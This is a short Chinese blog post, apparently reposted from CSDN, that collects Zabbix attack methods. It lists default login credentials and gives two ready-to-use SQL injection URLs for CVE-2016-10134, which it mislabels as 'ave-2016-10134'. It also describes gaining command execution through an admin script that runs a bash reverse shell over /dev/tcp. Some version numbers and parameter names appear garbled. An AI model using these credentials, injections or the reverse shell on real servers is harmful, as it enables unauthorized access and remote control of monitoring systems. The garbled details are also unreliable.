zabbix 漏洞收集总结

一：弱口令/默认账号

admin:zabbix
Admin:zabbix
guest: 空
在这里插入图片描述

二： sql注入(ave-2016-10134)

版本
2.2.x
3.3.0-3.03
1

http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,database()),0)
Sid要替换为zbx_session的后16位

http://ip:port/jsrpc.php?type=0&mode=1&method=screen.get&profileldx=web.item.graph&resourcetype=17 &profileldx2=updatexml(0,concat(0xa,database()),0)

三：系统命令执行

管理员登录
Administrator-script-createscript
bash -i >& /dev/tcp/ip/端口 0>&1

来源：CSDN

作者：sojrs_sec

链接：https://blog.csdn.net/sojrs_sec/article/details/103782432

标签

zabbix

toggle

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!

zabbix 漏洞收集总结

一： 弱口令/默认账号

二： sql注入(ave-2016-10134)

三：系统命令执行

一：弱口令/默认账号